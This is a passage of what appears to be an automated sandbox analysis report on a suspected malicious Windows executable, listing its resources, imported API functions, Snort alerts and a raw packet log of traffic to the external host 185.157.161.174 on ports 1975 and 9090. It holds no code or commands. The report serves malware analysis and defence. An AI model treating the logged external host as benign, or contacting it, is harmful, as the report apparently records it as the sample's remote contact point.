| .rsrc | 0x37000 | 0x2b718 | 0x2b800 | False | 0.208731815733 | data | 5.90932777211 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

                                                                                              Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_ICON | 0x37310 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States |
| RT_ICON | 0x47b38 | 0x94a8 | data | English | United States |
| RT_ICON | 0x50fe0 | 0x5488 | data | English | United States |
| RT_ICON | 0x56468 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 251658240 | English | United States |
| RT_ICON | 0x5a690 | 0x374f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x5dde0 | 0x25a8 | data | English | United States |
| RT_ICON | 0x60388 | 0x10a8 | data | English | United States |
| RT_ICON | 0x61430 | 0x988 | data | English | United States |
| RT_ICON | 0x61db8 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States |
| RT_DIALOG | 0x62220 | 0x100 | data | English | United States |
| RT_DIALOG | 0x62320 | 0x11c | data | English | United States |
| RT_DIALOG | 0x62440 | 0x60 | data | English | United States |
| RT_GROUP_ICON | 0x624a0 | 0x84 | data | English | United States |
| RT_MANIFEST | 0x62528 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States |

                                                                                              Imports

| DLL | Import |
|---|---|
| KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA |
| USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |

                                                                                              Possible Origin

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 12/07/21-13:38:54.454328 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59123 | 8.8.8.8 | 192.168.2.4 |
| 12/07/21-13:40:13.559829 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49769 | 104.16.154.36 | 192.168.2.4 |

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              Dec 7, 2021 13:38:54.686907053 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.686934948 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.686956882 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.686985970 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.687012911 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.687127113 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693095922 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693203926 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693223953 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693265915 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693294048 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693303108 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693336964 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693353891 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693360090 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693411112 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693418980 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693470955 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693475962 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693511009 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693550110 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693550110 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693573952 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693595886 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693603039 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693655014 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693687916 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693742037 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693746090 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693780899 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693798065 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693820000 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693836927 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693861008 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693870068 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693916082 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.693934917 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.693969965 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.905720949 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:55.554483891 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050323009 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050367117 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050388098 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050411940 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050453901 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050471067 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050482988 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050493002 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050528049 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050534964 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050575972 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050612926 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050632000 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050642967 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050673962 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050693989 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050704956 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050724030 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050739050 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050774097 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050797939 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050827980 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050848007 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050857067 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050887108 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050903082 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050924063 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050954103 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050975084 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.050991058 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.050995111 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051008940 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051043034 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051043987 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051078081 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051110983 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051132917 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051152945 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051152945 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051176071 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051207066 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051218987 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051223993 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051253080 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051284075 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051314116 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051316023 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051336050 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051357985 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051378012 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051398993 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051407099 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051412106 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051419020 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051440001 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051460028 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051461935 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051481962 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051496983 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051501989 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051522970 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051542997 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051563025 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051568031 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051573038 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.051583052 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.051664114 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.089647055 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.089675903 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.089693069 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.089734077 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.089768887 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.254667044 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.254818916 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.254873037 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.254982948 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255038977 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255062103 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255078077 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255091906 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255109072 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255146980 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255177975 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255215883 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255218029 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255223036 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255249977 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255290031 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255320072 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255342007 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255348921 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255367041 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255398989 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255434990 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255466938 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255491972 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255498886 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255505085 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255534887 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255573988 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255604982 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255635977 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255642891 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255644083 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255676985 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255714893 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255745888 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.255778074 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.255784035 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.260104895 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260143042 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260294914 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260365009 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.260380983 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.260412931 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260488987 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260536909 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260586977 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260633945 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260646105 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.260652065 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.260670900 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260700941 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260735035 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260771036 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260797977 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.260804892 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:56.260808945 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260840893 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:56.260921955 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.339271069 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.339303017 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.339371920 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341264009 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341289997 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341309071 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341325998 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341341019 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341357946 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341363907 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341375113 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341389894 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341406107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341422081 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341438055 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341444969 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341454983 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341470957 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341475010 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341486931 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341501951 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341510057 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341517925 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341536045 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341542959 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341552019 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341567993 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341569901 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341584921 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341599941 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341612101 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341615915 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341631889 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341646910 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341655016 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341661930 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341677904 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341690063 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341694117 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341708899 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341725111 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341726065 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341737032 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.341763973 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.341794014 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.358448982 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364211082 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364244938 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364260912 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364276886 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364281893 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.364293098 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364310980 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364326954 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364327908 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.364342928 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.364368916 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.496906042 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.543529034 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546708107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546750069 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546775103 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546797991 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546808958 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.546823025 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546845913 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.546854973 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.546895027 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.547554970 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547609091 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547672033 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547698975 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.547780991 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547807932 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.547828913 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.547979116 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.548031092 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.548387051 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552331924 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552372932 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552392960 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552397966 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552417040 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552442074 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552443981 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552465916 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552489996 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552509069 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552514076 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552535057 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552536964 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552562952 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552586079 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552588940 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552608967 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552629948 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552633047 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552658081 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552675962 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.552681923 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.552700996 CET909049735185.157.161.174192.168.2.4
